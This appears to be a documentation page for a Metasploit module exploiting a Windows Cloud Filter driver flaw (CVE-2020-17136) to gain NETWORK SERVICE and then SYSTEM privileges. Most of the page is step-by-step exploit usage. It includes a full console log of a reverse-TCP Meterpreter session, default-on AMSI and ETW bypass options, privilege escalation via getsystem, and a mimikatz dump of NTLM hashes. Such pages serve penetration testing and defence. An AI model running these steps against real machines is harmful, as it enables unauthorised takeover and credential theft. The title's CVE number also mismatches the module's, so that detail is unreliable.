CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP - Metasploit


This page contains detailed information about how to use the exploit/windows/local/cve_2020_17136 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
Module: exploit/windows/local/cve_2020_17136
Source code: modules/exploits/windows/local/cve_2020_17136.rb
Disclosure date: 2020-03-10
Last modification time: 2022-03-10 18:03:35 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-1170, CVE-2020-17136

The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/windows/local/cve_2020_17136
msf exploit(cve_2020_17136) > show targets
    ... a list of targets ...
msf exploit(cve_2020_17136) > set TARGET target-id
msf exploit(cve_2020_17136) > show options
    ... show and set options ...
msf exploit(cve_2020_17136) > set SESSION session-id
msf exploit(cve_2020_17136) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK and OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in.

This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's getsystem command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.

Installation And Setup

cldflt.sys should exist by default on all versions of Windows 10 v1803 and later.

Verification Steps


  1. Start msfconsole
  2. Get a shell as a low privileged user.
  3. Verify that getsystem does not get you a SYSTEM shell.
  4. use exploit/windows/local/cve_2020_17136
  5. set session *session id*
  6. run
  7. Verify that you get a new shell as the N user

Options


AMSIBYPASS

Enable or disable ASMI bypass.

ETWBYPASS

Enable or disable ETW bypass.

WAIT

Time in seconds to wait before starting to read the text output from the injected C# exe.

Scenarios


Windows 10 2004 x64 - Build 19041.630 with cldflt.sys version 10.0.19041.488

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.152.177:4444
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600

meterpreter > getuid
Server username: DESKTOP-KUO5CML\normal
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2020_17136) > check
[*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AMSIBYPASS  true             yes       Enable Amsi bypass
   ETWBYPASS   true             yes       Enable Etw bypass
   SESSION     1                yes       The session to run this module on.
   WAIT        5                no        Time in seconds to wait


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper


msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
LHOST => 172.22.159.28
msf6 exploit(windows/local/cve_2020_17136) > run

[*] Started reverse TCP handler on 172.22.159.28:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
[*] Running module against DESKTOP-KUO5CML
[*] Launching notepad.exe to host CLR...
[+] Process 100 launched.
[*] Reflectively injecting the Host DLL into 100..
[*] Injecting Host into 100...
[*] Host injected. Copy assembly into 100...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2733760425760
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 172.22.152.177
[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
normal    DESKTOP-KUO5CML  a38673ad58b19421e952fc317b62c3c4  ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test      DESKTOP-KUO5CML  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-KUO5CML$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-kuo5cml$  WORKGROUP        (null)
normal            DESKTOP-KUO5CML  (null)
test              DESKTOP-KUO5CML  (null)


meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/local/cve_2020_17136) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML  0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)

msf6 exploit(windows/local/cve_2020_17136) >

Go back to menu.

Msfconsole Usage


Here is how the windows/local/cve_2020_17136 exploit module looks in the msfconsole:

msf6 > use exploit/windows/local/cve_2020_17136

[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_17136) > show info

       Name: CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP
     Module: exploit/windows/local/cve_2020_17136
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-03-10

Provided by:
  James Foreshaw
  Grant Willcox

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows DLL Dropper

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  AMSIBYPASS  true             yes       Enable Amsi bypass
  ETWBYPASS   true             yes       Enable Etw bypass
  SESSION                      yes       The session to run this module on.
  WAIT        5                no        Time in seconds to wait

Payload information:

Description:
  The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, 
  prior to the December 2020 updates, did not set the 
  IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling 
  FltCreateFileEx() and FltCreateFileEx2() within its 
  HsmpOpCreatePlaceholders() function with attacker controlled input. 
  This meant that files were created with KernelMode permissions, 
  thereby bypassing any security checks that would otherwise prevent a 
  normal user from being able to create files in directories they 
  don't have permissions to create files in. This module abuses this 
  vulnerability to perform a DLL hijacking attack against the 
  Microsoft Storage Spaces SMP service, which grants the attacker code 
  execution as the NETWORK SERVICE user. Users are strongly encouraged 
  to set the PAYLOAD option to one of the Meterpreter payloads, as 
  doing so will allow them to subsequently escalate their new session 
  from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" 
  command to perform RPCSS Named Pipe Impersonation and impersonate 
  the SYSTEM user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-17136
  https://bugs.chromium.org/p/project-zero/issues/detail?id=2082
  https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136

Module Options


This is a complete list of options available in the windows/local/cve_2020_17136 exploit:

msf6 exploit(windows/local/cve_2020_17136) > show options

Module options (exploit/windows/local/cve_2020_17136):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AMSIBYPASS  true             yes       Enable Amsi bypass
   ETWBYPASS   true             yes       Enable Etw bypass
   SESSION                      yes       The session to run this module on.
   WAIT        5                no        Time in seconds to wait

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows DLL Dropper

Advanced Options


Here is a complete list of advanced options supported by the windows/local/cve_2020_17136 exploit:

msf6 exploit(windows/local/cve_2020_17136) > show advanced

Module advanced options (exploit/windows/local/cve_2020_17136):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   KILL                    false            yes       Kill the injected process at the end of the task
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (windows/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/local/cve_2020_17136 module can exploit:

msf6 exploit(windows/local/cve_2020_17136) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows DLL Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/cve_2020_17136 exploit:

msf6 exploit(windows/local/cve_2020_17136) > show payloads

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  payload/windows/x64/meterpreter_bind_named_pipe                      normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   21  payload/windows/x64/meterpreter_bind_tcp                             normal  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   22  payload/windows/x64/meterpreter_reverse_http                         normal  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   23  payload/windows/x64/meterpreter_reverse_https                        normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   24  payload/windows/x64/meterpreter_reverse_ipv6_tcp                     normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   25  payload/windows/x64/meterpreter_reverse_tcp                          normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64
   26  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   27  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   28  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   29  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   30  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   31  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   32  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   33  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   34  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   35  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   36  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   37  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   38  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   39  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   40  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   41  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   42  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   43  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   44  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   45  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   46  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   47  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   48  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   49  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   50  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   51  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   52  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   53  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   54  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   55  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   56  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   57  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   58  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   59  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   60  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   61  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/local/cve_2020_17136 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/local/cve_2020_17136) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Required dotnet version not present


Here is a relevant code snippet related to the "Required dotnet version not present" error message:

105:	      elsif fi[0] == '3'
106:	        vprint_status('Requirements ok')
107:	        return true
108:	      end
109:	    end
110:	    print_error('Required dotnet version not present')
111:	    false
112:	  end
113:	
114:	  def check
115:	    sysinfo_value = sysinfo['OS']

Target is not a Windows system, so it is not affected by this vulnerability!


Here is a relevant code snippet related to the "Target is not a Windows system, so it is not affected by this vulnerability!" error message:

113:	
114:	  def check
115:	    sysinfo_value = sysinfo['OS']
116:	    if sysinfo_value !~ /windows/i
117:	      # Non-Windows systems are definitely not affected.
118:	      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
119:	    end
120:	
121:	    build_num_raw = cmd_exec('cmd.exe /c ver')
122:	    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
123:	    if build_num.nil?

Couldn't retrieve the target's build number!


Here is a relevant code snippet related to the "Couldn't retrieve the target's build number!" error message:

119:	    end
120:	
121:	    build_num_raw = cmd_exec('cmd.exe /c ver')
122:	    build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
123:	    if build_num.nil?
124:	      return CheckCode::Unknown("Couldn't retrieve the target's build number!")
125:	    else
126:	      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
127:	      vprint_status("Target's build number: #{build_num}")
128:	    end
129:	

A vulnerable Windows 10 20H2 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 20H2 build was detected!" error message:

128:	    end
129:	
130:	    build_num_gemversion = Rex::Version.new(build_num)
131:	    # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
132:	    if (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.685')) # Windows 10 20H2
133:	      return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
134:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
135:	      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
136:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909
137:	      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903

A vulnerable Windows 10 20H1 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 20H1 build was detected!" error message:

130:	    build_num_gemversion = Rex::Version.new(build_num)
131:	    # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/
132:	    if (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.685')) # Windows 10 20H2
133:	      return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
134:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
135:	      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
136:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909
137:	      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
138:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903
139:	      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
140:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && (build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809

A vulnerable Windows 10 v1909 build was detected!


Here is a relevant code snippet related to the "A vulnerable Windows 10 v1909 build was detected!" error message:

132:	    if (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.685')) # Windows 10 20H2
133:	      return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')
134:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1
135:	      return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')
136:	    elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909
137:	      return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')
